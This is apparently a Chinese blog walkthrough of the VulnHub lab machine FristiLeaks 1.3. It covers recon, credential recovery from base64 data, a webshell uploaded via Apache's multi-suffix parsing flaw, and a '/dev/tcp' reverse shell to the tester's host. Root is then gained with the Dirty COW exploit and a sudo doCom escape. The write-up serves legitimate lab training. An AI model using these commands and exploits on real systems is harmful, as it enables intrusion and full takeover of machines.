首页 > 其他分享 >FRISTILEAKS: 1.3打靶渗透【附代码】(权限提升)

FRISTILEAKS: 1.3打靶渗透【附代码】(权限提升)

时间:2024-08-01 21:23:48浏览次数:16  
标签:尝试 文件 1.3 admin 40839 base64 打靶 txt FRISTILEAKS

靶机下载地址:FristiLeaks: 1.3 ~ VulnHubFristiLeaks: 1.3, made by Ar0xA. Download & walkthrough links are available.icon-default.png?t=N7T8https://www.vulnhub.com/entry/fristileaks-13,133/

1. 主机发现+端口扫描+目录扫描+敏感信息收集

1.1. 主机发现:

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:A5:A6:76'

1.2. 端口扫描:

nmap -p- 192.168.7.188

1.3. 目录扫描:

dirb http://192.168.7.188

1.4. 敏感信息收集:

操作系统:centOS;中间件Apache 2.2.15【后边有用】;语言php

2. WEB漏洞挖掘

2.1. 进入80端口

1.拼接目录扫描出的文件,/robots.txt

2.逐个拼接尝试【无用】 -> 返回初始页面,老规矩,逐个点就功能点,寻找疑似漏洞点 -> 拼接/fristi,进入一个登录页面

3.尝试万能密码无果,右键查看网站源代码 -> 发现图片下方存在一段base64加密字段,尝试解密

解码发现为png格式的数据信息,尝试利用kali自带的工具破解

4,将base64加密字段放入test.txt文件中,执行下方代码破解

base64 -d test.txt > test.png # base64 解码
cat test.png #查看
strings test.png
sz test.png # sz发送给自己 稍微等十几秒 按一下上下左右的右->键 一般就出来了

5.成功解析出一个图片,可能是账号也可能是密码

6.当初网页源代码也存在数据,疑似账号或者密码,尝试登录吧 -> 尝试得出账号密码[eezeepz:keKkeKKeKKeKkEkkEk]

2.2. 登入后台【eezeepz:keKkeKKeKKeKkEkkEk】

存在文件上传功能点 -> 尝试上传一句话木马文件 -> 黑白名单 无法利用文件上传漏洞

2.3. 尝试利用NDay获取权限

我们最初的漏洞流程挖掘流程起作用了,由于中间件为apache2.2.15版本,存在Apache HTTPD 多后缀解析漏洞:在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件。

1.尝试上传xxxxx.php.jpg文件

2.上传+改包

3.上传文件后给了路径 ->尝试蚁剑链接

2.4. 反弹shell至kali准备提权

nc -lvnp 4444 #kali打开监听接收
sh -i >& /dev/tcp/192.168.7.36/4444 0>&1 #在蚁剑执行反弹shell语句

3. 权限提升

3.1. 脏牛提权

1.权限为普通用户

2.查看版本信息

uname -a #查看系统的内核版本,为Linux 2.6.32-573.8.1.el6.x86_64

直接使用经典的脏牛漏洞,该漏洞影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统。

3.查找脏牛脚本 -> 用一个符合版本的脚本,将其导到当前路径

searchsploit 'Dirty COW'
searchsploit -m 40839.c

4.开启一个临时http服务,利用weget下载至靶机并赋予执行权限

python3 -m http.server 8001
wget 192.168.7.37:8001/40839.c
chmod +x 40839.c

5.编译并运行,密码自己设置,我这里设置6个6

gcc -pthread 40839.c -o 40839 -lcrypt
./40839

7.转换用户 -> 提权成功

su firefart

3.2. SUDO提权

1.返回/home,存在三个用户【admin\eezeepz\fristgod】

在eezeepz家目录下找到notes.txt

2.执行如下命令 -> 查看/tmp/cronresult

echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis
cat /tmp/cronresult

3.成功cd到admin用户 -> 打开那两个txt文件,发现存着两个base64数据

cd /home/admin

cat cryptedpass.txt

mVGZ3O3omkJLmy2pcuTq

cat whoisyourgodnow.txt

=RFn0AKnlMHMPIzpyuTI0ITG

4.打开.py文件,存在一个加密脚本

import base64,codecs,sys

def encodeString(str):

base64string= base64.b64encode(str)

return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])

print cryptoResult

5.尝试逆转机密机制,并将脚本保存到kali的test2.py文件中

import base64,codecs,sys

def decodeString(str):
  rot13string = codecs.decode(str[::-1], 'rot13')
  return base64.b64decode(rot13string)

print(decodeString(sys.argv[1]))

6.运行test2.py解密程序,解密两组base64数据

python test2.py mVGZ3O3omkJLmy2pcuTq
>>>b'thisisalsopw123'

python test2.py =RFn0AKnlMHMPIzpyuTI0ITG
>>>b'LetThereBeFristi!'

7.登录fristigod,发现并不是root权限

su fristigod
LetThereBeFristi!

8.history查看历史命令,发现执行命令时会使用sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

使用root权限输入命令后,加/bin/bash提权成功

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

标签:尝试,文件,1.3,admin,40839,base64,打靶,txt,FRISTILEAKS
From: https://blog.csdn.net/weixin_52487093/article/details/140857474

相关文章

  • Holynix-v1打靶渗透(权限提升)
    靶机下载地址:Holynix:v1~VulnHub1.主机发现+端口扫描+操作系统等信息收集确认物理地址主机扫描端口扫描操作系统等信息:2.目录扫描3.web漏洞测试3.1.80端口初始页面3.1.1.Login登录页面进入login登录页面输入账号密码进行抓包,利用sqlmap进行注入......
  • SpringBoot2.7 霸王硬上弓 Logback1.3 → 不甜但解渴
    开心一刻一大早,她就发消息质问我她:你给我老实交代,昨晚去哪鬼混了?我:没有,就哥几个喝了点酒她:那我给你打了那么多视频,为什么不接?我:不太方便呀她:我不信,和你哥们儿喝酒有啥不方便接视频的?她:你肯定有别的女人了!我:你老公就坐在我旁边,我敢接?前情回顾SpringBoot2.7还是任性的,就......
  • 【Vulnhub靶场AI-WEB-1.0打靶教程】
     第一步:查看虚拟机的ip第二步:扫描ip下开放的80端口第三步:扫描查到的ip地址下的目录第四步:访问查到的目录访问robot.txt第五步:访问robot.txt显示出的目录第六步:打开kali终端,使用sqlmap功能sqlmap-u"http://192.168.189.153/se3reTdir777/index.php"-data"uid=......
  • kubeadm安装部署K8S-1.30.2
    1、环境准备1.1、节点规划#CentOSLinuxrelease7.9.2009(Core)master0110.202.30.22 #4C8Gnode0110.202.30.30 #4C8Gnode0210.202.30.31 #4C8G1.2、配置hosts主机名解析#vim/etc/hosts10.202.30.22master0110.202.30.30nod......
  • SpringBoot2.7还是任性的,就是不支持Logback1.3,你能奈他何
    开心一刻今天上午,同事群中的刘总私聊我刘总:你来公司多久了我:一年了,刘总刘总:你还年轻,机会还很多,年底了,公司要裁员刘总语重心长的继续说到:以后我们常联系,无论以后你遇到什么困难,找我,我会尽量帮你!我:所以了,我是被裁了吗,呵,我爸知道吗?刘总:知道,今天上午保安部已经出名单了,你爸也在......
  • 云原生周刊:Kubernetes v1.31 中的移除和主要变更|2024.7.22
    开源项目ArgoRolloutsArgoRollouts是一个Kubernetes控制器和一组自定义资源定义(CRDs),提供高级部署功能,例如蓝绿部署、金丝雀部署、金丝雀分析、实验以及渐进式交付功能给Kubernetes。ArgoRollouts可选地集成了Ingress控制器和服务网格,利用它们的流量塑形能力,在更新期......
  • 1.3 CSS技术
     1.3CSS技术随着网页制作技术的不断发展,单调的HTML属性样式已经无法满足网页设计的需求。开发者往往需要更多的字体选择、更方便的样式效果、更绚丽的图形动画。CSS可以在不改变原有HTML结构的情况下,增加丰富的样式效果,极大地满足了开发者需求。本节将详细讲解CSS技术的......
  • 1.31、基于长短记忆网络(LSTM)的发动机剩余寿命预测(matlab)
    1、基于长短记忆网络(LSTM)的发动机剩余寿命预测的原理及流程基于长短期记忆网络(LSTM)的发动机剩余寿命预测是一种常见的机器学习应用,用于分析和预测发动机或其他设备的剩余可用寿命。下面是LSTM用于发动机剩余寿命预测的原理和流程:数据收集:首先收集发动机的传感器数据,例如......
  • 惊!咸鱼翻身了?揭秘闲鱼猪手1.3.9复活版背后的黑科技!
    大家好!我是闷声轻创!​在数字化时代,我们越来越依赖于智能助手来简化日常任务和提高效率。而今天要介绍的是一款咸鱼的自动化工具【闲鱼猪手】作为一款曾经广受欢迎的智能助手,虽然其原始开发者已停止维护,但幸运的是,有位技术大佬将其复活,赋予了它新的生命和功能。本文将详细介绍闲......
  • Seata 1.3.0 Oracle 回滚测试验证 报错 ORA-02289: 序列不存在
    使用Seata1.3.0版本,测试A服务调用B服务,且A方法中,手动写了一个异常,测试是否正常回滚(Mysql已经测试过)发现报错:ORA-02289:序列不存在 一看就是undo_log这张表的sequence没有建立,导致数据保存不了,太久没有用oracle了,之前搜索undo_log的建表SQL是直接在网上搜索的,所以缺少了建seq......